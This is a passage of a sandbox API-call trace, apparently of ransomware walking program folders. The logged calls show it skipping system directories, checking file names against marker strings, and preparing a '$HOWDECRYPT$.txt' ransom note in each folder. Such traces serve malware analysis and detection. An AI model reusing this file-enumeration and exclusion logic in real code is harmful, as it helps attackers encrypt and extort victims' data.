Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png") returned 75 [0093.097] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.097] lstrcmpW (lpString1="203x8subpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.097] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png") returned 75 [0093.097] GetProcessHeap () returned 0x2c0000 [0093.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346b88 [0093.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1498) returned 0x2c310e0 [0093.097] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.097] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.097] lstrlenW (lpString="Windows") returned 7 [0093.097] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.098] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.098] lstrlenW (lpString="System Volume Information") returned 25 [0093.098] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png") returned 88 [0093.098] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.098] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.098] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.098] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png") returned 88 [0093.098] GetProcessHeap () returned 0x2c0000 [0093.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x35a160 [0093.098] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14a0) returned 0x2c310e0 [0093.098] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.098] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.098] lstrlenW (lpString="Windows") returned 7 [0093.098] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.098] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.098] lstrlenW (lpString="System Volume Information") returned 25 [0093.098] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png") returned 94 [0093.098] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.098] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.098] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.098] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png") returned 94 [0093.098] GetProcessHeap () returned 0x2c0000 [0093.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfe) returned 0x381880 [0093.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14a8) returned 0x2c310e0 [0093.099] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.099] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.099] lstrlenW (lpString="Windows") returned 7 [0093.099] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.099] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.099] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.099] lstrlenW (lpString="System Volume Information") returned 25 [0093.099] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png") returned 89 [0093.099] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.099] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.099] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png") returned 89 [0093.099] GetProcessHeap () returned 0x2c0000 [0093.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a260 [0093.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14b0) returned 0x2c310e0 [0093.099] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.099] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.099] lstrlenW (lpString="Windows") returned 7 [0093.099] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.099] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.099] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.100] lstrlenW (lpString="System Volume Information") returned 25 [0093.100] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png") returned 95 [0093.100] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.100] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.100] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.100] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png") returned 95 [0093.100] GetProcessHeap () returned 0x2c0000 [0093.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x381988 [0093.100] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14b8) returned 0x2c310e0 [0093.100] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.100] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.100] lstrlenW (lpString="Windows") returned 7 [0093.100] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.100] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.100] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.100] lstrlenW (lpString="System Volume Information") returned 25 [0093.100] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png") returned 86 [0093.100] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.100] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.100] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.100] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png") returned 86 [0093.100] GetProcessHeap () returned 0x2c0000 [0093.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x3555a0 [0093.100] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c0) returned 0x2c310e0 [0093.101] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.101] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.101] lstrlenW (lpString="Windows") returned 7 [0093.101] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.101] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.101] lstrlenW (lpString="System Volume Information") returned 25 [0093.101] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png") returned 92 [0093.101] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.101] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.101] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png") returned 92 [0093.101] GetProcessHeap () returned 0x2c0000 [0093.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x381a90 [0093.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c8) returned 0x2c310e0 [0093.101] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.101] lstrcmpiW (lpString1="shatter.png", lpString2="Windows") returned -1 [0093.101] lstrlenW (lpString="Windows") returned 7 [0093.101] lstrcmpiW (lpString1="shatter.png", lpString2="$Recycle.bin") returned 1 [0093.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.101] lstrcmpiW (lpString1="shatter.png", lpString2="System Volume Information") returned -1 [0093.101] lstrlenW (lpString="System Volume Information") returned 25 [0093.101] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png") returned 67 [0093.102] StrStrIW (lpFirst="shatter.png", lpSrch=".spyhunter") returned 0x0 [0093.102] lstrcmpW (lpString1="shatter.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.102] lstrcmpW (lpString1="shatter.png", lpString2="_uninstalling_.png") returned 1 [0093.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png") returned 67 [0093.102] GetProcessHeap () returned 0x2c0000 [0093.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358060 [0093.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d0) returned 0x2c310e0 [0093.102] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0093.102] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0093.103] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\$HOWDECRYPT$.txt") returned 72 [0093.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\$HOWDECRYPT$.txt") returned 72 [0093.103] GetProcessHeap () returned 0x2c0000 [0093.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346728 [0093.103] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d8) returned 0x2c310e0 [0093.104] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.104] lstrcmpiW (lpString1="SpecialOccasion", lpString2="Windows") returned -1 [0093.104] lstrlenW (lpString="Windows") returned 7 [0093.104] lstrcmpiW (lpString1="SpecialOccasion", lpString2="$Recycle.bin") returned 1 [0093.104] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.104] lstrcmpiW (lpString1="SpecialOccasion", lpString2="System Volume Information") returned -1 [0093.104] lstrlenW (lpString="System Volume Information") returned 25 [0093.104] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 63 [0093.104] lstrcmpW (lpString1="SpecialOccasion", lpString2=".") returned 1 [0093.104] lstrcmpW (lpString1="SpecialOccasion", lpString2="..") returned 1 [0093.104] GetProcessHeap () returned 0x2c0000 [0093.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0093.105] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*") returned 65 [0093.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0093.113] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.113] lstrlenW (lpString="Windows") returned 7 [0093.113] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.113] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.113] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.114] lstrlenW (lpString="System Volume Information") returned 25 [0093.114] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\.") returned 65 [0093.114] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.114] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.114] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.114] lstrlenW (lpString="Windows") returned 7 [0093.114] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.114] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.114] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.114] lstrlenW (lpString="System Volume Information") returned 25 [0093.114] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\..") returned 66 [0093.114] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.114] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.114] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.114] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0093.114] lstrlenW (lpString="Windows") returned 7 [0093.115] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0093.115] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.115] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0093.115] lstrlenW (lpString="System Volume Information") returned 25 [0093.115] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png") returned 81 [0093.115] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0093.115] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.115] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0093.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png") returned 81 [0093.115] GetProcessHeap () returned 0x2c0000 [0093.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34eab8 [0093.115] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0093.115] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.115] lstrcmpiW (lpString1="mainscroll.png", lpString2="Windows") returned -1 [0093.115] lstrlenW (lpString="Windows") returned 7 [0093.115] lstrcmpiW (lpString1="mainscroll.png", lpString2="$Recycle.bin") returned 1 [0093.115] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.115] lstrcmpiW (lpString1="mainscroll.png", lpString2="System Volume Information") returned -1 [0093.115] lstrlenW (lpString="System Volume Information") returned 25 [0093.115] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png") returned 78 [0093.115] StrStrIW (lpFirst="mainscroll.png", lpSrch=".spyhunter") returned 0x0 [0093.115] lstrcmpW (lpString1="mainscroll.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.116] lstrcmpW (lpString1="mainscroll.png", lpString2="_uninstalling_.png") returned 1 [0093.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png") returned 78 [0093.116] GetProcessHeap () returned 0x2c0000 [0093.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3782a8 [0093.116] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0093.116] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.116] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.116] lstrlenW (lpString="Windows") returned 7 [0093.117] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.117] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.117] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.117] lstrlenW (lpString="System Volume Information") returned 25 [0093.117] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png") returned 96 [0093.117] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.117] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.117] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.117] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png") returned 96 [0093.117] GetProcessHeap () returned 0x2c0000 [0093.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x37a750 [0093.117] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0093.117] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.117] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.117] lstrlenW (lpString="Windows") returned 7 [0093.117] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.118] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.118] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.118] lstrlenW (lpString="System Volume Information") returned 25 [0093.118] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png") returned 102 [0093.118] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.118] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.118] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png") returned 102 [0093.118] GetProcessHeap () returned 0x2c0000 [0093.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10e) returned 0x375928 [0093.118] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0093.118] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.118] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.118] lstrlenW (lpString="Windows") returned 7 [0093.118] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.118] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.118] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.118] lstrlenW (lpString="System Volume Information") returned 25 [0093.118] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png") returned 97 [0093.118] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.118] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.118] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png") returned 97 [0093.118] GetProcessHeap () returned 0x2c0000 [0093.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x104) returned 0x37b110 [0093.119] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0093.119] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.119] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.119] lstrlenW (lpString="Windows") returned 7 [0093.119] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.119] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.119] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.119] lstrlenW (lpString="System Volume Information") returned 25 [0093.119] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png") returned 103 [0093.119] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.119] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.119] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.119] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png") returned 103 [0093.119] GetProcessHeap () returned 0x2c0000 [0093.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x110) returned 0x37b220 [0093.119] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0093.119] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.119] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.119] lstrlenW (lpString="Windows") returned 7 [0093.119] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.119] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.119] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.120] lstrlenW (lpString="System Volume Information") returned 25 [0093.120] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png") returned 94 [0093.120] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.120] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.120] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.120] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png") returned 94 [0093.120] GetProcessHeap () returned 0x2c0000 [0093.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfe) returned 0x381b98 [0093.120] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0093.120] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.120] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.120] lstrlenW (lpString="Windows") returned 7 [0093.120] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.120] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.120] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.120] lstrlenW (lpString="System Volume Information") returned 25 [0093.120] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png") returned 100 [0093.120] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.120] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.120] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.120] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png") returned 100 [0093.120] GetProcessHeap () returned 0x2c0000 